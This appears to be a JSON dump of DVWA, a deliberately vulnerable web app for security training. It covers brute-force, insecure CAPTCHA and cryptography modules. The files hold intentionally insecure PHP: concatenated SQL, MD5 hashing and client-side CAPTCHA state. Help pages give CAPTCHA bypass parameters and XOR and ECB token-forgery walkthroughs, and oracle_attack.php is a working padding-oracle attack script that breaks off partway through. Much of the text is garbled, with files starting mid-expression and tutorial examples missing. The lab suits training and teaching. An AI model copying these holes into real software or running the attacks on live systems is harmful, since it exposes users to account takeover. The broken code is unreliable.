\";\r\n\t\t}\r\n\t}\r\n\r\n\t// Check the database (if username matches the password)\r\n\t$data = $db->prepare( 'SELECT * FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );\r\n\t$data->bindParam( ':user', $user, PDO::PARAM_STR);\r\n\t$data->bindParam( ':password', $pass, PDO::PARAM_STR );\r\n\t$data->execute();\r\n\t$row = $data->fetch();\r\n\r\n\t// If its a valid login...\r\n\tif( ( $data->rowCount() == 1 ) && ( $account_locked == false ) ) {\r\n\t\t// Get users details\r\n\t\t$avatar = $row[ 'avatar' ];\r\n\t\t$failed_login = $row[ 'failed_login' ];\r\n\t\t$last_login = $row[ 'last_login' ];\r\n\r\n\t\t// Login successful\r\n\t\t$html .= \"
Welcome to the password protected area {$user}
\";\r\n\t\t$html .= \"Warning: Someone might of been brute forcing your account.
\";\r\n\t\t\t$html .= \"Number of login attempts: {$failed_login}.
Last login attempt was at: {$last_login}.
\";\r\n\r\n\t\t// Update bad login count\r\n\t\t$data = $db->prepare( 'UPDATE users SET failed_login = (failed_login + 1) WHERE user = (:user) LIMIT 1;' );\r\n\t\t$data->bindParam( ':user', $user, PDO::PARAM_STR );\r\n\t\t$data->execute();\r\n\t}\r\n\r\n\t// Set the last login time\r\n\t$data = $db->prepare( 'UPDATE users SET last_login = now() WHERE user = (:user) LIMIT 1;' );\r\n\t$data->bindParam( ':user', $user, PDO::PARAM_STR );\r\n\t$data->execute();\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/brute/source/low.php", "content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\tif( $result && mysqli_num_rows( $result ) == 1 ) {\r\n\t\t// Get users details\r\n\t\t$row = mysqli_fetch_assoc( $result );\r\n\t\t$avatar = $row[\"avatar\"];\r\n\r\n\t\t// Login successful\r\n\t\t$html .= \"
Username and/or password incorrect.
Alternative, the account has been locked because of too many failed logins.
If this is the case, please try again in {$lockout_time} minutes.
Welcome to the password protected area {$user}
\";\r\n\t\t$html .= \"\";\r\n\t}\r\n\r\n\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/brute/source/medium.php", "content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\tif( $result && mysqli_num_rows( $result ) == 1 ) {\r\n\t\t// Get users details\r\n\t\t$row = mysqli_fetch_assoc( $result );\r\n\t\t$avatar = $row[\"avatar\"];\r\n\r\n\t\t// Login successful\r\n\t\t$html .= \"
Username and/or password incorrect.
Welcome to the password protected area {$user}
\";\r\n\t\t$html .= \"\";\r\n\t}\r\n\r\n\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/captcha/help/help.php", "content": "
Username and/or password incorrect.
\r\n\t
\r\n\r\n\t
\r\n"
},
{
"path": "vulnerabilities/captcha/index.php",
"content": "reCAPTCHA API key missing from config file: \" . realpath( getcwd() . DIRECTORY_SEPARATOR . DVWA_WEB_PAGE_TO_ROOT . \"config\" . DIRECTORY_SEPARATOR . \"config.inc.php\" ) . \"\";\r\n\t$html = \"Please register for a key from reCAPTCHA: \" . dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/admin/create' );\r\n\t$hide_form = true;\r\n}\r\n\r\n$page[ 'body' ] .= \"\r\n\tHelp - Insecure CAPTCHA
\r\n\r\n\t\r\n\t\r\n\t
\r\n\r\n\t
\r\n\r\n\t\r\n\t\t About\r\n\t\tA is a program that can tell whether its user is a human or a computer. You've probably seen\r\n\t\t\tthem - colourful images with distorted text at the bottom of Web registration forms. CAPTCHAs are used by many websites to prevent abuse from\r\n\t\t\t\"bots\", or automated programs usually written to generate spam. No computer program can read distorted text as well as humans can, so bots\r\n\t\t\tcannot navigate sites protected by CAPTCHAs. \r\n\r\n\t\tCAPTCHAs are often used to protect sensitive functionality from automated bots. Such functionality typically includes user registration and changes,\r\n\t\t\tpassword changes, and posting content. In this example, the CAPTCHA is guarding the change password functionality for the user account. This provides\r\n\t\t\tlimited protection from CSRF attacks as well as automated bot guessing. \r\n\r\n\t\t\r\n\r\n\t\t Objective\r\n\t\tYour aim, change the current user's password in a automated manner because of the poor CAPTCHA system. \r\n\r\n\t\t\r\n\r\n\t\t Low Level\r\n\t\tThe issue with this CAPTCHA is that it is easily bypassed. The developer has made the assumption that all users will progress through screen 1, complete the CAPTCHA, and then\r\n\t\t\tmove on to the next screen where the password is actually updated. By submitting the new password directly to the change page, the user may bypass the CAPTCHA system. \r\n\r\n\t\tThe parameters required to complete this challenge in low security would be similar to the following: \r\n\t\tSpoiler: ?step=2&password_new=password&password_conf=password&Change=Change.\r\n\r\n\t\t\r\n\r\n\t\t Medium Level\r\n\t\tThe developer has attempted to place state around the session and keep track of whether the user successfully completed the\r\n\t\t\tCAPTCHA prior to submitting data. Because the state variable (Spoiler: passed_captcha) is on the client side,\r\n\t\t\tit can also be manipulated by the attacker like so: \r\n\t\tSpoiler: ?step=2&password_new=password&password_conf=password&passed_captcha=true&Change=Change.\r\n\r\n\t\t\r\n\r\n\t\t High Level\r\n\t\tThere has been development code left in, which was never removed in production. It is possible to mimic the development values, to allow\r\n\t\t\tinvalid values in be placed into the CAPTCHA field. \r\n\t\tYou will need to spoof your user-agent (Spoiler: reCAPTCHA) as well as use the CAPTCHA value of\r\n\t\t\t(Spoiler: hidd3n_valu3) to skip the check. \r\n\r\n\t\t\r\n\r\n\t\t Impossible Level\r\n\t\tIn the impossible level, the developer has removed all avenues of attack. The process has been simplified so that data and CAPTCHA verification occurs in one\r\n\t\t\tsingle step. Alternatively, the developer could have moved the state variable server side (from the medium level), so the user cannot alter it. \r\n\t | \r\n\t
\r\n\r\n\t
Reference:
\r\n\r\n\t
\\n\";\r\n\r\ndvwaHtmlEcho( $page );\r\n\r\n?>\r\n"
},
{
"path": "vulnerabilities/captcha/source/high.php",
"content": "' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t\t\t// Feedback for user\r\n\t\t\t$html .= \"Vulnerability: Insecure CAPTCHA
\r\n\r\n\t{$WarningHtml}\r\n\r\n\t\r\n\t\t\r\n\t\t{$html}\r\n\t
\r\n\r\n\tMore Information
\r\n\t- \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/CAPTCHA' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.google.com/recaptcha/' ) . \" \r\n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://owasp.org/www-project-automated-threats-to-web-applications/assets/oats/EN/OAT-009_CAPTCHA_Defeat' ) . \" \r\n\t
Password Changed.\";\r\n\r\n\t\t} else {\r\n\t\t\t// Ops. Password mismatch\r\n\t\t\t$html .= \"
Both passwords must match.\";\r\n\t\t\t$hide_form = false;\r\n\t\t}\r\n\r\n\t} else {\r\n\t\t// What happens when the CAPTCHA was entered incorrectly\r\n\t\t$html .= \"
\";\r\n\t\t$hide_form = false;\r\n\t\treturn;\r\n\t}\r\n\r\n\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/captcha/source/impossible.php", "content": "
The CAPTCHA was incorrect. Please try again.
The CAPTCHA was incorrect. Please try again.\";\r\n\t\t$hide_form = false;\r\n\t}\r\n\telse {\r\n\t\t// Check that the current password is correct\r\n\t\t$data = $db->prepare( 'SELECT password FROM users WHERE user = (:user) AND password = (:password) LIMIT 1;' );\r\n\t\t$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );\r\n\t\t$data->bindParam( ':password', $pass_curr, PDO::PARAM_STR );\r\n\t\t$data->execute();\r\n\r\n\t\t// Do both new password match and was the current password correct?\r\n\t\tif( ( $pass_new == $pass_conf) && ( $data->rowCount() == 1 ) ) {\r\n\t\t\t// Update the database\r\n\t\t\t$data = $db->prepare( 'UPDATE users SET password = (:password) WHERE user = (:user);' );\r\n\t\t\t$data->bindParam( ':password', $pass_new, PDO::PARAM_STR );\r\n\t\t\t$data->bindParam( ':user', dvwaCurrentUser(), PDO::PARAM_STR );\r\n\t\t\t$data->execute();\r\n\r\n\t\t\t// Feedback for the end user - success!\r\n\t\t\t$html .= \"
Password Changed.\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\t// Feedback for the end user - failed!\r\n\t\t\t$html .= \"
Either your current password is incorrect or the new passwords did not match.\";\r\n\t\t\t$hide_form = false;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n// Generate Anti-CSRF token\r\ngenerateSessionToken();\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/captcha/source/low.php", "content": "
Please try again.
The CAPTCHA was incorrect. Please try again.\";\r\n\t\t$hide_form = false;\r\n\t\treturn;\r\n\t}\r\n\telse {\r\n\t\t// CAPTCHA was correct. Do both new passwords match?\r\n\t\tif( $pass_new == $pass_conf ) {\r\n\t\t\t// Show next stage for the user\r\n\t\t\t$html .= \"\r\n\t\t\t\t
\r\n\t\t\t\t\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\t// Both new passwords do not match.\r\n\t\t\t$html .= \"
You passed the CAPTCHA! Click the button to confirm your changes.
Both passwords must match.\";\r\n\t\t\t$hide_form = false;\r\n\t\t}\r\n\t}\r\n}\r\n\r\nif( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {\r\n\t// Hide the CAPTCHA form\r\n\t$hide_form = true;\r\n\r\n\t// Get input\r\n\t$pass_new = $_POST[ 'password_new' ];\r\n\t$pass_conf = $_POST[ 'password_conf' ];\r\n\r\n\t// Check to see if both password match\r\n\tif( $pass_new == $pass_conf ) {\r\n\t\t// They do!\r\n\t\t$pass_new = ((isset($GLOBALS[\"___mysqli_ston\"]) && is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_real_escape_string($GLOBALS[\"___mysqli_ston\"], $pass_new ) : ((trigger_error(\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\", E_USER_ERROR)) ? \"\" : \"\"));\r\n\t\t$pass_new = md5( $pass_new );\r\n\r\n\t\t// Update database\r\n\t\t$insert = \"UPDATE `users` SET password = '$pass_new' WHERE user = '\" . dvwaCurrentUser() . \"';\";\r\n\t\t$result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $insert ) or die( '
' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t\t// Feedback for the end user\r\n\t\t$html .= \"
Password Changed.\";\r\n\t}\r\n\telse {\r\n\t\t// Issue with the passwords matching\r\n\t\t$html .= \"
Passwords did not match.\";\r\n\t\t$hide_form = false;\r\n\t}\r\n\r\n\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/captcha/source/medium.php", "content": "
The CAPTCHA was incorrect. Please try again.\";\r\n\t\t$hide_form = false;\r\n\t\treturn;\r\n\t}\r\n\telse {\r\n\t\t// CAPTCHA was correct. Do both new passwords match?\r\n\t\tif( $pass_new == $pass_conf ) {\r\n\t\t\t// Show next stage for the user\r\n\t\t\t$html .= \"\r\n\t\t\t\t
\r\n\t\t\t\t\";\r\n\t\t}\r\n\t\telse {\r\n\t\t\t// Both new passwords do not match.\r\n\t\t\t$html .= \"
You passed the CAPTCHA! Click the button to confirm your changes.
Both passwords must match.\";\r\n\t\t\t$hide_form = false;\r\n\t\t}\r\n\t}\r\n}\r\n\r\nif( isset( $_POST[ 'Change' ] ) && ( $_POST[ 'step' ] == '2' ) ) {\r\n\t// Hide the CAPTCHA form\r\n\t$hide_form = true;\r\n\r\n\t// Get input\r\n\t$pass_new = $_POST[ 'password_new' ];\r\n\t$pass_conf = $_POST[ 'password_conf' ];\r\n\r\n\t// Check to see if they did stage 1\r\n\tif( !$_POST[ 'passed_captcha' ] ) {\r\n\t\t$html .= \"
\";\r\n\t\t$hide_form = false;\r\n\t\treturn;\r\n\t}\r\n\r\n\t// Check to see if both password match\r\n\tif( $pass_new == $pass_conf ) {\r\n\t\t// They do!\r\n\t\t$pass_new = ((isset($GLOBALS[\"___mysqli_ston\"]) && is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_real_escape_string($GLOBALS[\"___mysqli_ston\"], $pass_new ) : ((trigger_error(\"[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.\", E_USER_ERROR)) ? \"\" : \"\"));\r\n\t\t$pass_new = md5( $pass_new );\r\n\r\n\t\t// Update database\r\n\t\t$insert = \"UPDATE `users` SET password = '$pass_new' WHERE user = '\" . dvwaCurrentUser() . \"';\";\r\n\t\t$result = mysqli_query($GLOBALS[\"___mysqli_ston\"], $insert ) or die( '
You have not passed the CAPTCHA.
' . ((is_object($GLOBALS[\"___mysqli_ston\"])) ? mysqli_error($GLOBALS[\"___mysqli_ston\"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '' );\r\n\r\n\t\t// Feedback for the end user\r\n\t\t$html .= \"
Password Changed.\";\r\n\t}\r\n\telse {\r\n\t\t// Issue with the passwords matching\r\n\t\t$html .= \"
Passwords did not match.\";\r\n\t\t$hide_form = false;\r\n\t}\r\n\r\n\t((is_null($___mysqli_res = mysqli_close($GLOBALS[\"___mysqli_ston\"]))) ? false : $___mysqli_res);\r\n}\r\n\r\n?>\r\n" }, { "path": "vulnerabilities/cryptography/help/help.php", "content": "\n\n
\n\t
\n"
},
{
"path": "vulnerabilities/cryptography/index.php",
"content": "\n\tHelp - Cryptographic Problems
\n\n\t\n\t\n\t
\n\n\t
\n\t\n\n\t\t About\n\t\t\n\t\tCryptography is key area of security and is used to keep secrets secret. When implemented badly these secrets can be leaked or the crypto manipulated to bypass protections.\n\t\t \n\t\t\n\t\tThis module will look at three weaknesses, using encoding instead of encryption, using algorithms with known weaknesses, and padding oracle attacks.\n\t\t \n\n\t\t\n\n\t\t Objective\n\t\tEach level has its own objective but the general idea is to exploit weak cryptographic implementations. \n\n\t\t\n\n\t\t Low Level\n\t\tThe thing to notice is the mention of encoding rather than encryption, that should give you a hint about the vulnerability here. \n\t\t\n\t\t\n\t\t \n\t\t\n\t\t \n\n\t\tStart by encoding a few messages and looking at the output, if you have spent any time around encoding standards you should be able to tell that it is in Base64. Could it be that simple? Try Base64 decoding some test strings to find out: \n\t\t\nThat failed, but what you might notice is that the number of output characters matches the number of input characters. Another common encoding method that is sometimes mistaken for encryption is XOR, this takes the clear text input and XORs each character with a key which is repeated or truncated to be the same length as the input. \n\nXOR is associative, this means that if you XOR the clear text with the key you get the cipher text and if you XOR the cipher text with the key you get the clear text, what it also means is if you XOR the clear text with the cipher text, you get the key. Let's try this with our examples:\n \n\t\t\nThis looks promising, let's try the second example:\n \n\t\t\nThere is no repetition in the key yet so let's try with a longer string.\n \n\n\t\t\nIt looks like we have found our key \"wachtwoord\". Let's give it a try on our challenge string:\n \n\n\nAnd there we have it, the message we are looking for and the password we need to login.\n \n\n\t\tAnother lesson here, do not assume that the messages or the underlying system you are working with is in English. The key \"wachtwoord\" is Dutch for password. \n\t\tMedium Level\n\t\tThe tokens are encrypted using an Electronic Code Book based algorithm (AES-128-ECB). In this mode, the clear text is broken down into fixed sized blocks and each block is encrypted independently of the rest. This results in a cipher text that is made up from a number of individual blocks with no way to tie them together. Worse than this, any two blocks, from any two clear text inputs, are interchangeable as long as they have been encrypted with the same key. In our example, this means you can take blocks from the three different tokens to make your own token. \n\t\t\n\t\t\n\t\t \n\t\t\n\t\t \n\n\t\t\n\t\t\tHow do you know the block size? This is given in the algorithm name. aes-128-ebc is a 128 bit block cipher. 128 bits is 16 bytes, but to make things human readable, the bytes are represented as hex characters meaning each byte is two characters. This gives you a block size of 32 characters. Sooty's token is 192 characters long, 192 / 32 = 6 and so Sooty's token has six code blocks.\n\t\t \n\n\t\t\nLet's start by breaking the tokens down into blocks. \nSooty: \nSweep: \nSoo: \n\n\t\tEach token has broken down nicely into blocks so we are on the right track.\n\t\t \n\t\t\n\t\tIf you look carefully at the blocks you will see that there are some that repeat over the different tokens, this means that the same clear text has been encrypted to create the block. If we look at the description we can try to map these to the JSON object.\n\t\t \n\t\t\n\t\tTaking Sooty as an example:\n\t\t \nSooty: \n\n\t\tAssuming we are right with our mappings, if you compare the blocks that match you can see that Sooty and Sweep both have the same expiry block (b85bb230876912bf3c66e50758b222d0) and both Sweep and Soo have the same level block (83f2d277d9e5fb9a951e74bee57c77a3). This matches with what we know about the tokens as both Sooty and Sweep have expired tokens and both Sweep and Soo are users, not admins.\n\t\t \n\t\t\n\t\tKnowing all this, we can now create our forged session token. We need to take the username block from Sweep, the expiry block from Soo and the level block from Sooty. We can then finish the token off with the remaining blocks from any of the tokens. This gives us:\n\t\t \n\n\t\t\tWhich gives us...\n\t\t \n\t\t\n\n\t\t \n\t\t\n\t\tThis is a very contrived setup with the tokens tweaked to force blocks to map to the JSON object so manipulation is easier to do, in the real world it is unlikely to be this easy however as data is often formed from fixed sized blocks overlaps can happen in a way that mixing blocks up results in valid data. Sometimes just being able to pass invalid data is enough so all that is needed is to swap blocks in a way that they can be decrypted and then passed on to the rest of the system where they will cause errors.\n\t\t \n\t\t\n\t\tIf you want to play with this some more, there is a script called ecb_attack.php in the sources directory which shows how the tokens were generated and lets you combine them in different ways to create custom tokens.\n\t\t \n\t\tHigh Level\n\t\tThe system is using AES-128-CBC which means it is vulnerable to a padding oracle attack. \n\n\t\t\n\t\t\n\t\t \n\n\t\t\n\t\t \n\n\t\tRather than try to explain this here, go read this excellent write up on the attack by Eli Sohl. \n\t\tCryptopals: Exploiting CBC Padding Oracles \n\t\t\n\t\tIf you want to play with this some more, there is a script called oracle_attack.php in the sources directory which runs through the full attack with debug. You can run this either against the DVWA site or it will run locally against its own pretend web server.\n\t\t \n\t\tImpossible Level\n\t\tYou can never say impossible in crypto as something that would take years today could take minutes in the future when a new attack is found or when processing power takes a giant leam forward. \n\t\t\n\t\tThe current recommended alternative to AES-CBC is AES-GCM and so the system uses that here. 256 bit blocks rather than 128 bit blocks are used, and a unique IV used for every message. This may be secure today but who knows what tomorrow brings?\n\t\t \n\t | \n\t
Vulnerability: Cryptography Problems
\n\n\t\n\";\n\n$page[ 'body' ] .= \"\n\t\t{$html}\n\t
\n\n\tMore Information
\n\t- \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://exploit-notes.hdks.org/exploit/cryptography/algorithm/aes-ecb-padding-attack', \"AES-ECB Padding Attack\" ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.scottbrady91.com/cryptopals/implementing-and-breaking-aes-ecb', \"Implementing and breaking AES ECB\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Block_cipher_mode_of_operation', \"Wikipedia - Block cipher mode of operation\" ) . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.nccgroup.com/us/research-blog/cryptopals-exploiting-cbc-padding-oracles/', \"Cryptopals: Exploiting CBC Padding Oracles - Best article\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://yurichev.org/pkcs7/', \"[Crypto] PKCS#7 padding\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Padding_oracle_attack', \"Padding oracle attack\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://medium.com/@masjadaan/oracle-padding-attack-a61369993c86', \"Oracle Padding Attack\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://robertheaton.com/2013/07/29/padding-oracle-attack/', \"The Padding Oracle Attack\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/Padding_%28cryptography%29', \"Wikipedia - Padding (cryptography)\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://gchq.github.io/CyberChef/', \"CyberChef\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.101computing.net/xor-encryption-algorithm/', \"XOR Encryption Algorithm\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://en.wikipedia.org/wiki/XOR_cipher', \"XOR Cipher\") . \" \n\t\t
- \" . dvwaExternalLinkUrlGet( 'https://www.youtube.com/watch?v=7WySPRERN0Q', \"Video walk-through by CryptoCat\") . \" \n\t
\n\t\t\tYou have managed to steal the following token from a user of the Prognostication application.\n\t\t
\n\t\t\n\t\t\t\n\t\t
\n\t\t\n\t\t\tYou can use the form below to provide the token to access the system. You have two challenges, first, decrypt the token to find out the secret it contains, and then create a new token to access the system as a other users. See if you can make yourself an administrator.\n\t\t
\n\t\t\n\t\t\n\";\n\n?>\n" }, { "path": "vulnerabilities/cryptography/source/impossible.php", "content": "\n\t\tfunction send_token() {\n\n\t\t\tconst url = 'source/check_token_impossible.php';\n\t\t\tconst data = document.getElementById ('token').value;\n\n\t\t\tconsole.log (data);\n\t\t\t \n\t\t\tfetch(url, { \n\t\t\t\t\tmethod: 'POST', \n\t\t\t\t\theaders: { \n\t\t\t\t\t\t'Content-Type': 'application/json' \n\t\t\t\t\t}, \n\t\t\t\t\tbody: data\n\t\t\t\t}) \n\t\t\t\t.then(response => { \n\t\t\t\t\tif (!response.ok) { \n\t\t\t\t\t\tthrow new Error('Network response was not ok'); \n\t\t\t\t} \n\t\t\t\treturn response.json(); \n\t\t\t\t}) \n\t\t\t\t.then(data => { \n\t\t\t\t\tconsole.log(data);\n\t\t\t\t\tmessage_line = document.getElementById ('message');\n\t\t\t\t\tif (data.status == 200) {\n\t\t\t\t\t\tmessage_line.innerText = 'Welcome back ' + data.user + ' (' + data.level + ')';\n\t\t\t\t\t\tmessage_line.setAttribute('class', 'success');\n\t\t\t\t\t} else {\n\t\t\t\t\t\tmessage_line.innerText = 'Error: ' + data.message;\n\t\t\t\t\t\tmessage_line.setAttribute('class', 'warning');\n\t\t\t\t\t}\n\t\t\t\t}) \n\t\t\t\t.catch(error => { \n\t\t\t\t\tconsole.error('There was a problem with your fetch operation:', error); \n\t\t\t}); \n\n\t\t}\n\t\n\t\t
\n\t\t\tYou have managed to steal the following token from a user of the Impervious application.\n\t\t
\n\t\t\n\t\t\t\n\t\t
\n\t\t\n\t\t\tThis being the impossible level, you should not be able to mess with the token in any useful way but feel free to try below.\n\t\t
\n\t\t\n\t\t\n\";\n\n?>\n" }, { "path": "vulnerabilities/cryptography/source/low.php", "content": "getMessage();\n\t}\n}\n\n$html = \"\n\t\t
\n\t\tThis super secure system will allow you to exchange messages with your friends without anyone else being able to read them. Use the box below to encode and decode messages.\n\t\t
\n\t\t\n\";\n\nif (!is_null ($encoded)) {\n\t$html .= \"\n\t\t\t\n\t\t\t\t
\";\n}\n\n$html .= \"\n\t\t\n\t\t
\n\t\tYou have intercepted the following message, decode it and log in below.\n\t\t
\n\t\t\n\t\t\n\t\t
\n\";\n\nif ($errors != \"\") {\n\t$html .= '' . $errors . '
';\n}\n\nif ($messages != \"\") {\n\t$html .= '' . $messages . '
';\n}\n\nif ($success != \"\") {\n\t$html .= '' . $success . '
';\n}\n\n$html .= \"\n\t\t\n\";\n?>\n"
},
{
"path": "vulnerabilities/cryptography/source/medium.php",
"content": "user == \"sweep\" && $user->ex > time() && $user->level == \"admin\") {\n\t\t\t\t\t$success = \"Welcome administrator Sweep\";\n\t\t\t\t} else {\n\t\t\t\t\t$messages = \"Login successful but not as the right user.\";\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t} catch(Exception $e) {\n\t\t$errors = $e->getMessage();\n\t}\n}\n\n$html = \"\n\t\t\n\t\tYou have managed to get hold of three session tokens for an application you think is using poor cryptography to protect its secrets:\n\t\t
\n\t\t\n\t\tSooty (admin), session expired\n\t\t
\n\t\t\n\n\t\t
\n\t\t\n\t\tSweep (user), session expired\n\t\t
\n\t\t\n\n\t\t
\n\t\t\n\t\tSoo (user), session valid\n\t\t
\n\t\t\n\n\t\t
\n\t\t\n\t\tBased on the documentation, you know the format of the token is:\n\t\t
\n\t\t{\n \\\"user\\\": \\\"example\\\",\n \\\"ex\\\": 1723620372,\n \\\"level\\\": \\\"user\\\",\n \\\"bio\\\": \\\"blah\\\"\n}\nYou also spot this comment in the docs:\n
\n\nTo ensure your security, we use aes-128-ecb throughout our application.\n\n\n\t\t
\n\t\t
\n\t\tManipulate the session tokens you have captured to log in as Sweep with admin privileges.\n\";\n\nif ($errors != \"\") {\n\t$html .= '
' . $errors . '
';\n}\n\nif ($messages != \"\") {\n\t$html .= '' . $messages . '
';\n}\n\nif ($success != \"\") {\n\t$html .= '' . $success . '
';\n}\n\n$html .= \"\n\t\t\n\";\n?>\n"
},
{
"path": "vulnerabilities/cryptography/source/oracle_attack.php",
"content": " $token,\n\t\t\t\t\t\"iv\" => $iv_string_b64\n\t\t\t\t);\n\n\tif (is_null ($url)) {\n\t\t$body = check_token (json_encode ($data));\n\t} else {\n\t\t$ch = curl_init();\n\n\t\tcurl_setopt($ch, CURLOPT_URL, $url);\n\t\tcurl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type:application/json', 'Accept:application/json'));\n\t\tcurl_setopt($ch, CURLOPT_POST, 1);\n\t\tcurl_setopt($ch, CURLOPT_POSTFIELDS, json_encode ($data));\n\n\t\tcurl_setopt($ch, CURLOPT_RETURNTRANSFER, true);\n\t\tcurl_setopt($ch, CURLOPT_HEADER, true);\n\n\t\t$response = curl_exec($ch);\n\n\t\t$header_size = curl_getinfo($ch, CURLINFO_HEADER_SIZE);\n\t\t$header = substr($response, 0, $header_size);\n\t\t$body = substr($response, $header_size);\n\n\t\t// May return false or something that evaluates to false\n\t\t// so can't do strict type check\n\t\tif ($response == false) {\n\t\t\tprint \"Could not access remote server, is the URL correct?\n${url}\n\";\n\t\t\texit;\n\t\t}\n\t\tif (strpos ($header, \"200 OK\") === false) {\n\t\t\tprint \"Check token script not found, have you got the right URL?\n${url}\n\";\n\t\t\texit;\n\t\t}\n\n\t\tcurl_close($ch);\n\t}\n\n\treturn json_decode ($body, true);\n}\n\nfunction do_attack ($iv_string_b64, $token, $url) {\n\t$iv_string = base64_decode ($iv_string_b64);\n\t$temp_init_iv = unpack('C*', $iv_string);\n\n\t# The unpack creates an array starting a 1, the\n\t# rest of this code assumes an array starting at 0\n\t# so calling array_values changes the array 0 based\n\n\t$init_iv = array_values ($temp_init_iv);\n\n\tprint \"Trying to decrypt\\n\";\n\tprint \"\\n\";\n\n\t$iv = zero_array(16);\n\t$zeroing = zero_array(16);\n\n\n\tfor ($padding = 1; $padding <= 16; $padding++) {\n\t\t$offset = 16 - $padding;\n\t\tprint (\"Looking at offset $offset for padding $padding\\n\");\n\t\tfor ($i = 0; $i <= 0xff; $i++) {\n\t\t\t$iv[$offset] = $i;\n\t\t\tfor ($k = $offset + 1; $k < 16; $k++) {\n\t\t\t\t$iv[$k] = $zeroing[$k] ^ $padding;\n\t\t\t}\n\t\t\ttry {\n\t\t\t\t$obj = make_call ($token, $iv, $url);\n\n\t\t\t\t# 526 is decryption failed\n\t\t\t\tif ($obj['status'] != 526) {\n\t\t\t\t\tprint \"Got hit for: \" . $i . \"\\n\";\n\n\t\t\t\t\t# Only get here if the decrypt works correctly\n\n\t\t\t\t\t/*\n\n\t\t\t\t\tCheck for edge case on offset 15 (right most byte).\n\t\t\t\t\tThe decrypted data could look like this:\n\n\t\t\t\t\t0x44 ... 0x02 0x02\n\t\t\t\t\t\t\t\t ^^^^ Real last byte of value 2 byte padding\n\n\t\t\t\t\tIn this situation, if we happen to land on a value \n\t\t\t\t\tthat sets the last byte to 0x02 then that will\n\t\t\t\t\tlook like valid padding as it will make the data end\n\t\t\t\t\tin 0x02 0x02 as it already does:\n\n\t\t\t\t\t0x44 ... 0x02 0x02\n\t\t\t\t\t\t\t\t ^^^^ Fluke, we want 0x01 for 1 byte padding\n\n\t\t\t\t\tThis is what we want:\n\n\t\t\t\t\t0x44 ... 0x02 0x01\n\t\t\t\t\t\t\t\t ^^^^ Valid 1 byte padding\n\n\t\t\t\t\tTo do this, change the IV value for offset 14 which will\n\t\t\t\t\tchange the second to last byte and make the call again.\n\t\t\t\t\tIf we were in the edge case we would now have:\n\n\t\t\t\t\t0x44 ... 0xf3 0x02\n\t\t\t\t\t\t\t\t ^^^^ No longer valid padding\n\n\t\t\t\t\tThis is no longer valid padding so it will fail and we can \n\t\t\t\t\tcontinue looking till we find the value that gives us\n\t\t\t\t\tvalid 1 byte padding.\n\n\t\t\t\t\t*/\n\n\t\t\t\t\t// Used by the edge case check\n\n\t\t\t\t\t$ignore = false;\n\t\t\t\t\tif ($offset == 15) {\n\t\t\t\t\t\tprint \"Got a valid decrypt for offset 15, checking edge case\\n\";\n\t\t\t\t\t\t$temp_iv = $iv;\n\t\t\t\t\t\t$temp_iv[14] = 0xff;\n\t\t\t\t\t\t$temp_d_obj = make_call 